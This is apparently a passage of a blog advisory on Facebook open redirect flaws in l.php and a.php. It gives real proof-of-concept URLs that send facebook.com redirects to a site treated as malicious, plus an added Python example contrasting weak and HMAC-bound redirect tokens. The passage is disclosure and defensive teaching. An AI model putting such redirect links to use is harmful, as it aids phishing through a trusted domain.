<span style="font-family: Arial, Helvetica, sans-serif;">&lt;1&gt; For parameter "h", two forms of authentication are used.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> &lt;a&gt; h=HAQHyinFq</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> &lt;b&gt; h=<wbr></wbr>hAQHalW1CAQHrkVIQNNqgwhxRWLNsF<wbr></wbr>VeH3auuImlbR1CgKA</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;2&gt; For parameter "eid", one form of authentication is used.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> <a>eid=<wbr></wbr>AQLP8sRq6lbU0jz0lARx9A9uetB6FI<wbr></wbr>F1N2-Yjj_ePj0d_<wbr></wbr>ezubjstZeDo6qDsalKVJwy6uDb_hQ-<wbr></wbr>9tBsA2dVoQRq0lniOu0os_<wbr></wbr>gPe3gY5l8lYblhQSwBtdvgjXjNqaxL<wbr></wbr>ZMYoasr3vv46tFsh1fL7q4kjT2LFw5<wbr></wbr>2dnJWd4SE8qc0YuPWfgPeQywgM2wl0<wbr></wbr>CoW-<wbr></wbr>lftWkr2dX0dLcytyHjXnvhKfVS_<wbr></wbr>pQBllszUzsPENxE6EuZ-<wbr></wbr>53Lh188o56idnfyyk2L58pE7C94PF-<wbr></wbr>za4ZVB0qbuA2EnPcSJI-<wbr></wbr>7oIiIJmIhifHe0CYTzG512-Z_<wbr></wbr>heN44VlyJHevhS9auAR8-<wbr></wbr>lFCAIlYymnT_<wbr></wbr>Qiwp92RxjNOfBypBvszQUrvB6PH3fA<wbr></wbr>Nn1prfMBVm4RD_<wbr></wbr>GFel14KVDS5USswbTOTkL3sZNhHUqq<wbr></wbr>PHwBwU3JFePMMuwsfesigH85B_<wbr></wbr>AxCsXUIWN7klKGSq8bPPsKSHttsa9h<wbr></wbr>kkMpSfRKL7D_<wbr></wbr>xwW4dU2xlmfGWil7jYRJmwfbOeF0zu<wbr></wbr>jk1FRBuM757tbfFMav-J-<wbr></wbr>K9npbdrDrCuUVqV__Tf7CGZ89nPl-<wbr></wbr>M2d09pE9enJj0OBXOaSXZX16LKaYnv<wbr></wbr>1Wh4GKme7C-EOunITxyQtp1zy-<wbr></wbr>48Uaz9mxO2x4bw7sBDfzDStF_Al8_<wbr></wbr>0SMjWNTh-J38rBHAgT96X-<wbr></wbr>dPFI43HU3x3fVymE9szrclBpvTaSfY<wbr></wbr>ezatgMzf77s3lQrQAMSlwSSRIzRuoF<wbr></wbr>vQBmWKT0T5ZFgH5ykhYKhNMiKj577U<wbr></wbr>O5g2Ojm-_-KKF4N_DBuG5R-<wbr></wbr>I6EOSlhok2xUkpKVDnDcxZFTLxGmx5<wbr></wbr>xc56J5kZLjJ96wnF2fH09Q19Qc2aU3<wbr></wbr>xYFlEFrKjrlLpwGyOyCDx7_<wbr></wbr>z7y1O4Efqew3Fa0Cb9s6Kk2jpLF5XE<wbr></wbr>IaYzzXOLAffxXG6icBJVovb9RPmiZ5<wbr></wbr>s9dKYYotLol68_X04O05bEvVccPEh-<wbr></wbr>IQwX_<wbr></wbr>VTMt3f23be2MECEqR2l1A1ZkJx4qP0<wbr></wbr>0GI1pZhU_<wbr></wbr>CXAnjSaTNmtaINRUeSsLNEZZsPwpWJ<wbr></wbr>MfeeGSwuof9krC05eSWjO0jH9tua0K<wbr></wbr>teMYhj8i-<wbr></wbr>3dwSBp4f7nMcFwH5ltfCLhMCYNB8rx<wbr></wbr>gzcAczyhLIo2UY-<wbr></wbr>3FSaJXBZ0lvuZBvnj7myUnyc2lCcy-<wbr></wbr>fWh93MRRaJrrinjtfr9fDSMHM9Cja5<wbr></wbr>xi0eG3Vs0aClnWbeJZA79TvmYt7E53<wbr></wbr>HfwGuv5-EJOqRh3cwZF-<wbr></wbr>53uPHA73ikUk3xTApjQunJM4uIBhpy<wbr></wbr>7iBIgn_<wbr></wbr>OXXo3X03YUJtJcDuC20ocJbZ310VHl<wbr></wbr>iox5tYZF2oiMaOfgo9Y9KeqgsrJgwP<wbr></wbr>CJei
f4aB0Ne4g_oM_<wbr></wbr>Tuqt2pXbdgoCawHIApF087eFKJqejp<wbr></wbr>0jpEkJerXPyK-IqsD_SQfIm_<wbr></wbr>2WJSkzwzATwQKs</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-uv4devrx3B8/VLIw_4BOG_I/AAAAAAAAAl4/9qRvuLAa1W4/s1600/facebook_developer.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://1.bp.blogspot.com/-uv4devrx3B8/VLIw_4BOG_I/AAAAAAAAAl4/9qRvuLAa1W4/s400/facebook_developer.png" width="400" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b>(2) Vulnerability Description 1:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1)</b> A security researcher reported two Open Redirect vulnerabilities to Facebook in 2013. The following are the two links reported.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="http://www.facebook.com/l.php?u=http://www.bing.com&h=mAQHgtP_E" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com/l.php?<wbr></wbr>u=http://www.bing.com&h=<wbr></wbr>mAQHgtP_E</span></a></div>
<div>
<a href="http://facebook.com/campaign/landing.php?url=http://www.adcash.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://facebook.com/campaign/<wbr></wbr>landing.php?url=http://www.<wbr></wbr>adcash.com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Although a new mechanism was adopted, all previously generated redirections still work through the parameters "h" and "eid". </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2)</b> A website was used for the following tests. The website is "<a href="http://www.tetraph.com/" target="_blank">http://www.tetraph.com/</a>". Suppose this website is malicious.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2.1)</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;1&gt; First test </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;a&gt; file: "l.php" </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;b&gt; URL parameter: "u" </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;c&gt; authentication parameter: "h" </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;d&gt; form: "h=HAQHyinFq". </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;e&gt; The authentication is not related to any of the other parameters, such as "s". </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Examples:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL 1:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.aboutads.info%2F&h=lAQHmVMhS&s=1" target="_blank">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.aboutads.<wbr></wbr>info%2F&h=lAQHmVMhS&s=1</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Forbidden:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=lAQHmVMhS&s=1" target="_blank">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=lAQHmVMhS&s=1</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Works:</b></span></div>
<div>
<a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=zAQHEyzSM&s=1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=zAQHEyzSM&s=1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL 2:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fweborama.com%2F&h=DAQEpwCpS&s=1" target="_blank">http://bg-bg.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fweborama.<wbr></wbr>com%2F&h=DAQEpwCpS&s=1</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Forbidden:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=DAQEpwCpS&s=1" target="_blank">http://bg-bg.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&h=DAQEpwCpS&s=1</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Works:</b></span></div>
<div>
<a href="http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=wAQEE6xBX&s=1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://bg-bg.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&h=wAQEE6xBX&s=1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2.2)</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;2&gt; Second test. It is the same situation as above. </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;a&gt; file: "l.php" </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;b&gt; URL parameter: "u" </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;c&gt; authentication parameter: "h"</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;d&gt; form: "h=<wbr></wbr>hAQHalW1CAQHrkVIQNNqgwhxRWLNsF<wbr></wbr>VeH3auuImlbR1CgKA". </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;e&gt; The authentication is not related to any of the other parameters, such as "env", "s". </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Examples:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL 1:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.internet.org%2F&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxqvjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-z2Pm7C63N&s=1" target="_blank">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.internet.<wbr></wbr>org%2F&h=<wbr></wbr>pAQHnUOVGAQGcsXLy0MBttG7W1uiOv<wbr></wbr>Sghc_POwYa6k35hbw&enc=<wbr></wbr>AZNBNYyWIbhPD6ZDAw1Zom458dO6dN<wbr></wbr>BHnPh1tWnzEgxsxqvjfAbnH1ynSYgN<wbr></wbr>NOvQzY7oolrIRfkll4-z2Pm7C63N&<wbr></wbr>s=1</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Forbidden:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxqvjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-z2Pm7C63N&s=1" target="_blank">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=<wbr></wbr>pAQHnUOVGAQGcsXLy0MBttG7W1uiOv<wbr></wbr>Sghc_POwYa6k35hbw&enc=<wbr></wbr>AZNBNYyWIbhPD6ZDAw1Zom458dO6dN<wbr></wbr>BHnPh1tWnzEgxsxqvjfAbnH1ynSYgN<wbr></wbr>NOvQzY7oolrIRfkll4-z2Pm7C63N&<wbr></wbr>s=1</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><b>Redirect Works:</b></span></div>
<div>
<a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=1AQFqhVX6AQGawLw_EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw&enc=AZM7oFmJObAuJmy999wnRjD-QralcP-Ust3CHBrFxZ85bS1oI5vS46cPhdJmYq6YcfsTcZYBrPTRsZyEeHCe_rdQ&s=1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=1AQFqhVX6AQGawLw_<wbr></wbr>EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw<wbr></wbr>&enc=AZM7oFmJObAuJmy999wnRjD-<wbr></wbr>QralcP-<wbr></wbr>Ust3CHBrFxZ85bS1oI5vS46cPhdJmY<wbr></wbr>q6YcfsTcZYBrPTRsZyEeHCe_rdQ&s=<wbr></wbr>1</span></a></div>
<div>
<a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=1AQFqhVX6AQGawLw_EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=1AQFqhVX6AQGawLw_<wbr></wbr>EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL 2:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DNdWaZkvAJfM&h=WAQEcLD6fAQHtLbKKDhiimLXlIIx0zoyjfyusHjY5YHmaGQ&enc=AZMtxhh0RHpegvMkZLG-uyFxqCzDxCefM9H2AF8TnVCTtGMnwy5WVA4EPcZVOiJ0wOFCui6nWmRBqQDoZE0cVww6&s=1" target="_blank">http://af-za.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>youtube.com%2Fwatch%3Fv%<wbr></wbr>3DNdWaZkvAJfM&h=<wbr></wbr>WAQEcLD6fAQHtLbKKDhiimLXlIIx0z<wbr></wbr>oyjfyusHjY5YHmaGQ&enc=<wbr></wbr>AZMtxhh0RHpegvMkZLG-<wbr></wbr>uyFxqCzDxCefM9H2AF8TnVCTtGMnwy<wbr></wbr>5WVA4EPcZVOiJ0wOFCui6nWmRBqQDo<wbr></wbr>ZE0cVww6&s=1</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Forbidden:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=GAQHkk7KaAQFgp-1UpPt8vTc1mpZVcR-ZCObBHYZTd6oRUA&enc=AZPA-1iOt4L5BTDo2RMqXagplQxCjYMuw6LZzH3XdMeOpvvcwMdzZwplx5OZLlH0q8QszFr2Nu9Ib_tA8l8So-pW&s=1" target="_blank">http://af-za.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&h=GAQHkk7KaAQFgp-<wbr></wbr>1UpPt8vTc1mpZVcR-<wbr></wbr>ZCObBHYZTd6oRUA&enc=AZPA-<wbr></wbr>1iOt4L5BTDo2RMqXagplQxCjYMuw6L<wbr></wbr>ZzH3XdMeOpvvcwMdzZwplx5OZLlH0q<wbr></wbr>8QszFr2Nu9Ib_tA8l8So-pW&s=1</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Works:</b></span></div>
<div>
<a href="http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=WAQEcLD6fAQHtLbKKDhiimLXlIIx0zoyjfyusHjY5YHmaGQ&enc=AZMtxhh0RHpegvMkZLG-uyFxqCzDxCefM9H2AF8TnVCTtGMnwy5WVA4EPcZVOiJ0wOFCui6nWmRBqQDoZE0cVww6&s=1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://af-za.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&h=<wbr></wbr>WAQEcLD6fAQHtLbKKDhiimLXlIIx0z<wbr></wbr>oyjfyusHjY5YHmaGQ&enc=<wbr></wbr>AZMtxhh0RHpegvMkZLG-<wbr></wbr>uyFxqCzDxCefM9H2AF8TnVCTtGMnwy<wbr></wbr>5WVA4EPcZVOiJ0wOFCui6nWmRBqQDo<wbr></wbr>ZE0cVww6&s=1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
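<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The tests in (2.2.1) and (2.2.2) show a value of "h" that was issued for one link being accepted with a different "u". The following is an added example, not Facebook's code and not part of the original advisory: it contrasts a redirector that only checks that "h" was issued with one that binds "h" to the destination and an expiry time. The key, the lifetime, the "e" parameter and the ".example" hosts are assumptions made for the illustration.</span></div>

```python
import hashlib
import hmac
import secrets
import time
from urllib.parse import parse_qs, urlencode, urlsplit

SECRET = b"constructed-demo-key"  # assumption: server-side key, never sent to clients
TOKEN_TTL = 3600                  # assumption: a link stays valid for one hour

# Weak scheme: "h" is only checked for having been issued; "u" is never consulted.
_ISSUED = set()


def weak_issue(url):
    token = secrets.token_urlsafe(6)
    _ISSUED.add(token)
    return "/l.php?" + urlencode({"u": url, "h": token})


def weak_check(link):
    query = parse_qs(urlsplit(link).query)
    return query.get("h", [""])[0] in _ISSUED


# Bound scheme: "h" is an HMAC over the expiry time and the exact destination.
def _tag(url, expires):
    # The expiry is digits only and comes first, so "|" separates it unambiguously.
    message = f"{expires}|{url}".encode()
    return hmac.new(SECRET, message, hashlib.sha256).hexdigest()


def bound_issue(url, now=None):
    expires = int(time.time() if now is None else now) + TOKEN_TTL
    return "/l.php?" + urlencode({"u": url, "e": expires, "h": _tag(url, expires)})


def bound_check(link, now=None):
    query = parse_qs(urlsplit(link).query)
    try:
        url, expires, tag = query["u"][0], int(query["e"][0]), query["h"][0]
    except (KeyError, ValueError):
        return False  # a required parameter is missing or malformed
    if (time.time() if now is None else now) > expires:
        return False  # previously generated links stop working after the lifetime
    # Constant-time comparison; any change to "u" or "e" changes the expected tag.
    return hmac.compare_digest(tag.encode(), _tag(url, expires).encode())


def swap_destination(link, new_url):
    """Rebuild a link with a different "u", keeping every other parameter."""
    parts = urlsplit(link)
    query = parse_qs(parts.query)
    query["u"] = [new_url]
    return parts.path + "?" + urlencode(query, doseq=True)


if __name__ == "__main__":
    original = "https://partner.example/"   # constructed destination
    other = "https://other.example/"        # constructed destination
    print("weak scheme accepts swapped u: ",
          weak_check(swap_destination(weak_issue(original), other)))
    print("bound scheme accepts swapped u:",
          bound_check(swap_destination(bound_issue(original), other)))
```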
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(3) Facebook File "a.php" Open Redirect Security Vulnerability</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(3.1)</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;a&gt; file: "a.php"</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;b&gt; parameter "u"</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;c&gt; authentication parameter: "eid"</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><d> form: "eid=5967147530925355409.<wbr></wbr>6013336879369.<wbr></wbr>AQKBG5nt468YgKeiSdgExZQRjwGb9r<wbr></wbr>6EOu-Uc5WPvi-<wbr></wbr>EVHEzadq8YSrgSvUzbMmxKPPfTgM-<wbr></wbr>JrPff7tN38luc-8h16lxL0Gj_4qs1-<wbr></wbr>58yWgXirMH4AEf8sOEsZc5DTx7yFnd<wbr></wbr>gODvD5NrC-<wbr></wbr>314BIj4pZvMhlljXv89lHRH6pBgyGG<wbr></wbr>Vm-<wbr></wbr>oWBDIF8CuRER1f5ZGbKdsiUcBISdWT<wbr></wbr>ninVzvBdW1mZY0SWzqT21fZmhgVKtd<wbr></wbr>kRf5l_<wbr></wbr>pag7hAmotFK9HI5XHfGicWVqzRyTNi<wbr></wbr>DIYjyVjTv4km2FOEp7WP3w65aVUKP_<wbr></wbr>w". </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;e&gt; The authentication is not related to any of the other parameters, such as "mac", "_tn_".</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Examples:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Vulnerable URL:</b></span></div>
<div>
<a href="https://www.facebook.com/a.php?u=http%3A%2F%2Ffb-nym.adnxs.com%2Ffclick%3Fclickenc%3Dhttp%253A%252F%252Fbs.serving-sys.com%252FBurstingPipe%252FadServer.bs%253Fcn%253Dtf%2526c%253D20%2526mc%253Dclick%2526pli%253D8782431%2526PluID%253D0%2526ord%253D%257BCACHEBUSTER%257D%26cp%3D%253Fdi%253DzGxX6INl-T9QvRSibN_3P5qZmZmZmfk_UL0Uomzf9z_ObFfog2X5P_WPPCuD-to_CKEeLew3cQIQkc9SAAAAAHQcDQB2BQAAKAcAAAIAAAD4iq8AanMCAAAAAQBVU0QAVVNEAGMASABq4DoFka4BAgUCAQUAAIgAkinLswAAAAA.%252Fcnd%253D%252521qQYdPgjeqqYBEPiVvgUY6uYJIAA.%252Freferrer%253Dfacebook.com%252F&mac=AQJllyaGzLYoRoQz&__tn__=%2AB&eid=5967147530925355409.6013336879369.AQKBG5nt468YgKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT21fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYjyVjTv4km2FOEp7WP3w65aVUKP_w" target="_blank"><span style="color: black; font-family: Arial, Helvetica, 
sans-serif;">https://www.facebook.com/a.<wbr></wbr>php?u=http%3A%2F%2Ffb-nym.<wbr></wbr>adnxs.com%2Ffclick%3Fclickenc%<wbr></wbr>3Dhttp%253A%252F%252Fbs.<wbr></wbr>serving-sys.com%<wbr></wbr>252FBurstingPipe%252FadServer.<wbr></wbr>bs%253Fcn%253Dtf%2526c%253D20%<wbr></wbr>2526mc%253Dclick%2526pli%<wbr></wbr>253D8782431%2526PluID%253D0%<wbr></wbr>2526ord%253D%257BCACHEBUSTER%<wbr></wbr>257D%26cp%3D%253Fdi%<wbr></wbr>253DzGxX6INl-T9QvRSibN_<wbr></wbr>3P5qZmZmZmfk_UL0Uomzf9z_<wbr></wbr>ObFfog2X5P_WPPCuD-to_<wbr></wbr>CKEeLew3cQIQkc9SAAAAAHQcDQB2BQ<wbr></wbr>AAKAcAAAIAAAD4iq8AanMCAAAAAQBV<wbr></wbr>U0QAVVNEAGMASABq4DoFka4BAgUCAQ<wbr></wbr>UAAIgAkinLswAAAAA.%252Fcnd%<wbr></wbr>253D%<wbr></wbr>252521qQYdPgjeqqYBEPiVvgUY6uYJ<wbr></wbr>IAA.%252Freferrer%<wbr></wbr>253Dfacebook.com%252F&mac=<wbr></wbr>AQJllyaGzLYoRoQz&__tn__=%2AB&<wbr></wbr>eid=5967147530925355409.<wbr></wbr>6013336879369.<wbr></wbr>AQKBG5nt468YgKeiSdgExZQRjwGb9r<wbr></wbr>6EOu-Uc5WPvi-<wbr></wbr>EVHEzadq8YSrgSvUzbMmxKPPfTgM-<wbr></wbr>JrPff7tN38luc-8h16lxL0Gj_4qs1-<wbr></wbr>58yWgXirMH4AEf8sOEsZc5DTx7yFnd<wbr></wbr>gODvD5NrC-<wbr></wbr>314BIj4pZvMhlljXv89lHRH6pBgyGG<wbr></wbr>Vm-<wbr></wbr>oWBDIF8CuRER1f5ZGbKdsiUcBISdWT<wbr></wbr>ninVzvBdW1mZY0SWzqT21fZmhgVKtd<wbr></wbr>kRf5l_<wbr></wbr>pag7hAmotFK9HI5XHfGicWVqzRyTNi<wbr></wbr>DIYjyVjTv4km2FOEp7WP3w65aVUKP_<wbr></wbr>w</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC:</b></span></div>
<div>
<a href="https://www.facebook.com/a.php?u=http%3A%2F%2Fwww.tetraph.com&mac=AQJllyaGzLYoRoQz&__tn__=%2AB&eid=5967147530925355409.6013336879369.AQKBG5nt468YgKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT21fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYjyVjTv4km2FOEp7WP3w65aVUKP_w" target="_blank"><span style="color: black; font-family: Arial, Helvetica, 